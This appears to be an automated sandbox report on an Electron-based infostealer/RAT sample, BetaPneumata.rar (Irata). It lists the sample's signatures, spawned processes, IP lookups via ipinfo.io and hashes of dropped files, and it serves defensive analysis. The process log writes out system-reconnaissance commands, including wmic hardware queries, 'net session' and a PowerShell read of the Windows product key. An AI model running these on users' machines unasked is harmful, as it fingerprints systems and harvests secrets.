Malware Analysis Report

2025-01-19 06:04

Sample ID 231217-apmtxsddal
Target BetaPneumata.rar
SHA256 2ccffa1a0365dbece3af1d6b369db1cd01368c0a832cc697490ae32c8d5bbd9c
Tags
irata infostealer rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2ccffa1a0365dbece3af1d6b369db1cd01368c0a832cc697490ae32c8d5bbd9c

Threat Level: Known bad

The file BetaPneumata.rar was found to be: Known bad.

Malicious Activity Summary

irata infostealer rat trojan

Irata

Irata payload

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Enumerates processes with tasklist

Detects videocard installed

Collects information from the system

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Runs net.exe

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-17 00:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-17 00:23

Reported

2023-12-17 00:28

Platform

win7-20231215-en

Max time kernel

151s

Max time network

134s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Pneumata.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Pneumata.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2172 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Pneumata.exe C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe
PID 2172 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Pneumata.exe C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe
PID 2172 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Pneumata.exe C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe
PID 2172 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Pneumata.exe C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe
PID 2904 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 1540 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1540 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1540 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2904 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe
PID 2904 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe
PID 2904 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe
PID 2904 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe
PID 2904 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2492 wrote to memory of 2368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2492 wrote to memory of 2368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2492 wrote to memory of 2368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2904 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1548 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1548 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1732 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1732 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1732 wrote to memory of 1632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1632 wrote to memory of 1880 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1632 wrote to memory of 1880 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1632 wrote to memory of 1880 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2904 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe C:\Windows\system32\cmd.exe
PID 436 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 436 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 436 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1084 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1084 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1084 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2204 wrote to memory of 988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2204 wrote to memory of 988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2204 wrote to memory of 988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 436 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 436 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com

Processes

C:\Users\Admin\AppData\Local\Temp\Pneumata.exe

"C:\Users\Admin\AppData\Local\Temp\Pneumata.exe"

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe

"C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\Pneumata.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1028 --field-trial-handle=1148,6502161085469059011,2232232593793095979,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=2172 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2172 get ExecutablePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2Zb73OH2vbGIW9Z8HhUh0XvZlKq\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp

Files

\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\d3dcompiler_47.dll

MD5 59e1250822b5d67aef173a03845a0f6b
SHA1 d815208681c9c5921c68708308a49277cd846349
SHA256 d8835a50473844589bc263fa87b5040b36e4be73d6d3ca1474177e47413b7a64
SHA512 c025486c4debd1ba2806ccb4e3540483b4738b9d8e71d0683d8e4f878be88d7aa4f754a00d1e543a3eea4e76b1bf054c7a79ecb3f3bd976cedceb453e3a8994c

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\ffmpeg.dll

MD5 bd900b559108f1b228f37b0cb60bd2ce
SHA1 1a549e9f3e6c0089a8a4b53ba04bc08b0333b0b8
SHA256 f52328fea0f0dd3ab569067a67168b71fe9312479d87111cabc5319cce26ce09
SHA512 08afd53478fe5a309fbbf76d9e01ce1e14f43738ae12f529a9b4f535c2cc97e421c99a9e9437fbda66fa2c2ebc4c7b0306afcca4d2afde4af7f3209e1ae99d9a

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\libEGL.dll

MD5 684bbbafe1343275267687c62dccda28
SHA1 4160589fcb265b18899e6573795085510f74a4a5
SHA256 85cd87729ec3d7c5ddd349aa0623885ca42c1f20751a1d280824e78417f790d6
SHA512 6291737cd8b3b18960ca81ac29663c544828895928677671d3c67bec3cbae2c900616c5a54cce78fdb517e8fe345d062f7a0f8776cf6a8e170c55f0d247c0dfc

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\icudtl.dat

MD5 4c3d33c96582bdbd4700b8ddaccbfc62
SHA1 3478f4538733ed4d0912bb8335e5b0deb8d98eca
SHA256 96b033eadffb3ddf334e00d68052c0d93d736897489aac5cad1a01368402f5dd
SHA512 64dc9727d1a547bca0bef301a90c3f7db6b2f97e9c73868b9c6148401e5a5d742995aeb1ab66b8aa330b086227781cd459edb26212b0e0580677b00a2261e4b6

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\libGLESv2.dll

MD5 483869c28bf030db159891cd15fda1c8
SHA1 6ed76f5b623e2c40d737e1e332fb2fa0901d3d00
SHA256 acc475ac5d5d93dab36475ad1e4ada1dcdb785d759e12bdce65829089370774f
SHA512 471bbf7ec8c2eb02575c6e1dabe051200e408a69c52c6108b4436d82a70011a2c0b2f3f1484ae028eb7e6519b06e40468824ec5e754b1e9194e92b2c762d17f0

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\LICENSES.chromium.html

MD5 bd61f5c38506323587d87a746f1f3886
SHA1 e1420b6bf93580e6d96a3da3b1a54f6a8945b987
SHA256 319e8b3810193d1e66cb696b93ed198f7fed983f864d1ccdad583854e4e7885c
SHA512 3432fe87850eb3cd5faa7fa223ba6a7f7d7b2a83cf35e6327c869375a6ddf68caf4e0df4170cf96a009f3206d8cfd8165e5d6126b4ffbd5187fa20861db13780

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\Pneumata.exe

MD5 f509191f554a26e2383f241681fdb38f
SHA1 085bf568a0e042d463964ca5136eb3b61c835d18
SHA256 dd0f848ee8b0c6b3b5d4a5f1468e2afcee754fc24c61f42fa759d4ee027aef16
SHA512 b834d6e62becbcf793d6703c5615e2eb363da9318792c7931b36a8d3d53cfa4886899cbd64919ba626eafd3692b3ef2751178ffea22d78685dfdc510376e60dc

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\resources.pak

MD5 bfa47d0eefa73927097f0597eda3b204
SHA1 86f55ca7ee04e723ab1a3c0082d9bd904848b290
SHA256 6ba9bd4b6d0819499a984a2787c321ee91a58feaefb598e414e9c2123bb5f47a
SHA512 4e0aed10b3fc0b36f8c1e39e252ac0d062b5630c16b63fd20e0208fe2ac8236cfc7c438bb4679826c58e9cd3326eb94d0081b373c179d93ed16280b98fd884e2

C:\Users\Admin\AppData\Local\Temp\nso7F8D.tmp\7z-out\vulkan-1.dll

MD5 cf40415e3ba652006b918a2a1c0835e7
SHA1 f6beafa742542f56c4644722ec25ef1c4ff82c8f
SHA256 e00a41b25c3f347f5ce4046c761305389bd1c1ad7d5a47d39ede54455ae41fe3
